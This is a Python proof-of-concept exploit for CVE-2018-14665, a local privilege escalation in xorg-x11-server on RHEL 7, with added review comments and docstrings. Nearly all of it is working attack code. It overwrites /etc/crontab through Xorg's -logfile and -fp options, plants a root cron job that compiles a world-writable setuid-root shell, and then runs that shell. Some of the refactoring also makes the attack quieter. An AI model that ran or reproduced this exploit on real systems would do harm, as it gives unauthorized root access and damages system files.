
# Exploit Title: xorg-x11-server < 1.20.1 - Local Privilege Escalation (RHEL 7)
# Date: 2018-11-07
# Exploit Author: @bolonobolo
# Vendor Homepage: https://www.x.org/
# Version: 1.19.5
# Tested on: RHEL 7.3 && 7.5
# CVE: CVE-2018-14665
# Explanation
# The only condition that has to be met for this privilege escalation (PE) to work over SSH is that
# the legitimate non-root user must be logged in through the console at the moment the PE script
# is launched. During that console session a file named after the non-root user is created in
# the /var/run/console folder. With that file present, the same non-root user can launch a Xorg
# command via SSH.
#
# Usage: $ python poc.py
# $ python poc.py
# [*] Waiting for bolo to connect to the console
# [*] OK --> bolo console opened
# [*] Building root shell wait 2 minutes
# [*] crontab overwritten
#
# ... cut Xorg output ...
#
# [*] Xorg killed
# (II) Server terminated successfully (0). Closing log file.
# [*] Don't forget to cleanup /etc/crontab and /tmp dir
# sh-4.2# id && whoami
# uid=0(root) gid=0(root) gruppi=0(root),1001(bolo)
# root
# sh-4.2#
#
# Caution: the PoC replaces /etc/crontab with Xorg's log output and leaves a setuid-root
# /usr/local/bin/shell plus /tmp/payload and /tmp/shell.c on disk. Back up /etc/crontab
# before running and remove all of these artifacts afterwards.
#!/usr/bin/python
# NOTE(review): this interpreter line is not on line 1 (the header comment precedes it), so it is
# not honoured when the file is executed directly; run it as `python poc.py` as the usage text
# says, or move this line to the top of the file.
import getpass
import os
import subprocess
import time
# Accumulator kept for compatibility; nothing in the visible code reads it.
userList = []

# Directory in which a file named after a user appears while that user holds
# a console login (see the header comment); main() polls it before Xorg is run.
path = "/var/run/console/"
def getWhoami():
    """Return the login name of the user running this script (via getpass)."""
    current_user = getpass.getuser()
    return current_user
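def getConsole(path):
    """Return the entry names found under *path* (the console-lock directory).

    The original shelled out to ``ls`` and split its output with
    ``str.splitlines``; that forks a process on every poll and breaks on
    Python 3, where ``Popen`` returns bytes that ``str.splitlines`` rejects.
    ``os.listdir`` yields the same names without a subprocess.

    Args:
        path: Directory to list.

    Returns:
        list[str]: entry names in unspecified order (``ls`` sorted them;
        main() only tests membership, so order is irrelevant).  Dotfiles are
        included, unlike with ``ls``.  A missing or unreadable directory
        yields an empty list, matching the ``ls`` behaviour of printing an
        error and producing no names, so a polling caller simply keeps
        waiting.
    """
    try:
        return os.listdir(path)
    except OSError:
        # ENOENT/EACCES: "no consoles open" rather than a crash.
        return []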
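def payload(dest="/tmp/payload"):
    """Write the shell script that cron will run as root to *dest*.

    The script, run by the crontab line planted by executePayload(), compiles
    a tiny setuid(0)/setgid(0) wrapper around /bin/sh into
    /usr/local/bin/shell and marks it setuid.  The leading ``cp`` puts a plain
    copy of /bin/sh at that path first, presumably as a fallback if gcc is
    missing on the target -- TODO confirm.

    Args:
        dest: Path of the script to write.  Defaults to /tmp/payload, which
            is the path executePayload() schedules.

    The script text is byte-identical to the original PoC.  Only the file
    handling changed: a context manager guarantees the file is flushed and
    closed before it is chmod'ed and executed (the original relied on the
    interpreter closing the handle at function exit).
    """
    script = (
        "cp /bin/sh /usr/local/bin/shell\n"
        "echo \"#include <stdio.h> \" > /tmp/shell.c\n"
        "echo \"#include <stdlib.h>\" >> /tmp/shell.c\n"
        "echo \"#include <sys/types.h>\" >> /tmp/shell.c\n"
        "echo \"#include <unistd.h>\" >> /tmp/shell.c\n"
        "echo 'int main(){setuid(0);setgid(0);system(\"/bin/sh\");}' >> /tmp/shell.c\n"
        "gcc /tmp/shell.c -o /usr/local/bin/shell\n"
        # NOTE(review): 4777 makes the root shell world-writable; 4755 is all
        # the PoC needs.  Left as in the original so the header's cleanup
        # advice still describes exactly what lands on disk.
        "chmod 4777 /usr/local/bin/shell\n"
    )
    with open(dest, "w") as fh:
        fh.write(script)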
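def executePayload(settle=5, cron_wait=120):
    """Plant the cron line through Xorg's log file, then wait for cron to run it.

    Xorg -- which on the affected build runs with root privileges (the PoC
    depends on it) -- is started with cwd /etc and ``-logfile crontab``, so
    its log is written to /etc/crontab; the ``-fp`` value is echoed into that
    log and becomes a crontab entry that runs /tmp/payload as root every
    minute (the CVE-2018-14665 mechanism, see header).  After *settle*
    seconds the X server is terminated and the function sleeps *cron_wait*
    seconds so cron can pick up the new file and run the payload.

    The previous content of /etc/crontab is lost (Xorg may keep a copy as
    crontab.old -- confirm on the target); back it up before running.

    Args:
        settle: Seconds to let Xorg open and write its log before it is
            killed.  Default 5, as in the original.
        cron_wait: Seconds to wait for the planted entry to fire.  Default
            120, the "wait 2 minutes" of the original.

    Raises:
        OSError: if /tmp/payload does not exist (see payload()) or Xorg is
            not on PATH.  The original silently continued in both cases.

    Changes from the original: the payload is made executable with os.chmod
    instead of ``os.system("chmod +x")``; Xorg is launched with
    subprocess.Popen (no shell, explicit cwd) and stopped through its own
    handle rather than ``pkill Xorg``, which would also signal any other Xorg
    process this user is allowed to kill; sleeps use time.sleep.
    """
    script = "/tmp/payload"
    # Equivalent of `chmod +x`: keep the permission bits, add execute for all.
    mode = os.stat(script).st_mode & 0o7777
    os.chmod(script, mode | 0o111)

    # -logfile is resolved relative to cwd, so "crontab" lands in /etc.
    xorg = subprocess.Popen(
        ["Xorg", "-fp", "* * * * * root " + script, "-logfile", "crontab", ":1"],
        cwd="/etc",
    )
    print("[*] crontab overwritten")
    time.sleep(settle)
    xorg.terminate()  # SIGTERM, the same signal pkill sends by default
    xorg.wait()
    print("[*] Xorg killed")
    time.sleep(cron_wait)
    return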
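def main():
    """Wait for the current user to hold a console login, then run the PoC.

    As the header explains, Xorg can only be launched over SSH once a file
    named after the user exists in /var/run/console, so this polls that
    directory until the running user's entry appears, plants the payload via
    executePayload(), and finally runs the setuid shell the payload built.

    Changes from the original: the poll loop is a plain ``while`` on
    membership instead of a flag variable, and it sleeps one second between
    polls.  The original spun with no pause, forking ``ls`` as fast as the
    machine allowed, which burns CPU and is conspicuous in process accounting
    for no gain -- the console file appears at login, not on a sub-second
    timescale.  All printed strings are unchanged.
    """
    whoami = getWhoami()
    print("[*] Waiting for " + whoami + " to connect to the console")

    while whoami not in getConsole(path):
        time.sleep(1)
    print("[*] OK --> " + whoami + " console opened")

    print("[*] Building root shell wait 2 minutes")
    payload()
    executePayload()
    print("[*] Don't forget to cleanup /etc/crontab and /tmp dir")
    # Hand the terminal to the setuid(0) wrapper compiled by the payload.
    os.system("/usr/local/bin/shell")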
# Entry point: the PoC only runs when the file is executed directly, not on import.
if __name__ == "__main__":
    main()